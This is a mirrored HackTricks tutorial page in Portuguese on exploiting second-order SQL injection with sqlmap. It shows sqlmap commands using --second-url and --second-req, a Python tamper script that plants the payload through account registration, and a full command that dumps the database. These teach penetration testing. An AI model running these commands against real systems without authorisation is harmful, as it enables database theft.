mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-29 22:43:11 +00:00
85 lines
5 KiB
Markdown
85 lines
5 KiB
Markdown
**SQLMap pode explorar Segundas Ordens SQLis.**\
|
|
Você precisa fornecer:
|
|
|
|
* A **requisição** onde o **payload de injeção SQL** será salvo
|
|
* A **requisição** onde o **payload** será **executado**
|
|
|
|
A requisição onde o payload de injeção SQL é salvo é **indicada como em qualquer outra injeção no sqlmap**. A requisição **onde o sqlmap pode ler a saída/execução** da injeção pode ser indicada com `--second-url` ou com `--second-req` se você precisar indicar uma requisição completa de um arquivo.
|
|
|
|
**Exemplo simples de segunda ordem:**
|
|
```bash
|
|
#Get the SQL payload execution with a GET to a url
|
|
sqlmap -r login.txt -p username --second-url "http://10.10.10.10/details.php"
|
|
|
|
#Get the SQL payload execution sending a custom request from a file
|
|
sqlmap -r login.txt -p username --second-req details.txt
|
|
```
|
|
Em vários casos, isso não será suficiente porque você precisará realizar outras ações além de enviar a carga útil e acessar uma página diferente.
|
|
|
|
Quando isso for necessário, você pode usar um **sqlmap tamper**. Por exemplo, o seguinte script registrará um novo usuário **usando a carga útil do sqlmap como email** e sairá.
|
|
```python
|
|
#!/usr/bin/env python
|
|
|
|
import re
|
|
import requests
|
|
from lib.core.enums import PRIORITY
|
|
__priority__ = PRIORITY.NORMAL
|
|
|
|
def dependencies():
|
|
pass
|
|
|
|
def login_account(payload):
|
|
proxies = {'http':'http://127.0.0.1:8080'}
|
|
cookies = {"PHPSESSID": "6laafab1f6om5rqjsbvhmq9mf2"}
|
|
|
|
params = {"username":"asdasdasd", "email":payload, "password":"11111111"}
|
|
url = "http://10.10.10.10/create.php"
|
|
pr = requests.post(url, data=params, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
|
|
|
|
url = "http://10.10.10.10/exit.php"
|
|
pr = requests.get(url, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
|
|
|
|
def tamper(payload, **kwargs):
|
|
headers = kwargs.get("headers", {})
|
|
login_account(payload)
|
|
return payload
|
|
```
|
|
Um **tamper do SQLMap é sempre executado antes de iniciar uma tentativa de injeção com uma carga útil** **e ele tem que retornar uma carga útil**. Neste caso, não nos importamos com a carga útil, mas nos importamos em enviar algumas solicitações, para que a carga útil não seja alterada.
|
|
|
|
Portanto, se por algum motivo precisarmos de um fluxo mais complexo para explorar a injeção de SQL de segunda ordem, como:
|
|
|
|
* Criar uma conta com a carga útil SQLi dentro do campo "email"
|
|
* Sair
|
|
* Fazer login com essa conta (login.txt)
|
|
* Enviar uma solicitação para executar a injeção de SQL (second.txt)
|
|
|
|
**Esta linha do sqlmap ajudará:**
|
|
```bash
|
|
sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy http://127.0.0.1:8080 --prefix "a2344r3F'" --technique=U --dbms mysql --union-char "DTEC" -a
|
|
##########
|
|
# --tamper tamper.py : Indicates the tamper to execute before trying each SQLipayload
|
|
# -r login.txt : Indicates the request to send the SQLi payload
|
|
# -p email : Focus on email parameter (you can do this with an "email=*" inside login.txt
|
|
# --second-req second.txt : Request to send to execute the SQLi and get the ouput
|
|
# --proxy http://127.0.0.1:8080 : Use this proxy
|
|
# --technique=U : Help sqlmap indicating the technique to use
|
|
# --dbms mysql : Help sqlmap indicating the dbms
|
|
# --prefix "a2344r3F'" : Help sqlmap detecting the injection indicating the prefix
|
|
# --union-char "DTEC" : Help sqlmap indicating a different union-char so it can identify the vuln
|
|
# -a : Dump all
|
|
```
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
|
|
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
|
|
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
|
|
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
|
|
- **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|